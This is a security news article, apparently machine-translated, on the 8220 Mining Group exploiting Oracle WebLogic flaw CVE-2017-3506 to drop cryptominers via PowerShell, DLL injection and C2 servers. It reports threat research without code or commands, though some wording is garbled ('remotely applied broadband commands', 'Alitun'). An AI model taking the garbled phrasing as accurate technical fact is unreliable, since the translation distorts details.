Perhaps the cloud technology group has changed its goals in using Oracle technologies.
Trend Micro specialists introduced a new general grouping 8220 (8220 Mining Group), during which hackers exploited a 6-year-old Oracle WebLogic vulnerability to deliver a cryptominer to an infected system.
The attacks used vulnerability CVE-2017-3506 (CVSS: 7.4), which is present on the WLS Security component in Oracle WebLogic and allows distribution of remotely applied broadband commands via an HTTP request with a specially crafted XML document. The flaw makes it possible to gain unauthorized access to confidential data or compromise the system.
The 8220 exploited the HTTP URI "wls-wsat/CoordinatorPortType" to infiltrate the system. After logging in, the hackers delivered a PowerShell script that downloaded an executable file (including cryptominers) from the IP address of the command and control server (C2 server).
The upload file loads a DLL that is injected into the MS Build process. The DLL file is securely obfuscated to make it harder for analysts to work. The DLL configuration information is Base64 encoded, the new linking process is performed by three C2 servers using the same TCP port 9090, 9091 or 9092 to download the cryptominer.
In recent attacks, the group also used "lwp-download", a Linux utility to download a file from a specified URL. Observers have also observed the use of this utility to hack Windows systems.
Abuse of "lwp-download" can be expected in the short term to compromise and target another platform. Despite the reuse of tools and C2 servers, the 8220 group began to attack the Windows system and use new files and C2 servers to bypass detections.
Earlier, security investigators from Fortinet FortiGuard Labs reported that the 8220 Gang cryptominer group is delivering a new ScrubCrypt encryptor to the system, and cryptojacking has been received. The chain of attacks begins with the exploitation of Oracle WebLogic servers to download PowerShell scripts hosting ScrubCrypt.
Experts name 8220 low-skilled financially motivated hackers who penetrate AWS, Azure, GCP, Alitun and QCloud hosts using vulnerabilities in Docker, Redis, Confluence and Apache. In addition, the group has its own cryptominer called PwnRig, based on the XMRig miner. PwnRig uses a fake FBI subdomain with an IP address pointing to a Brazilian government resource.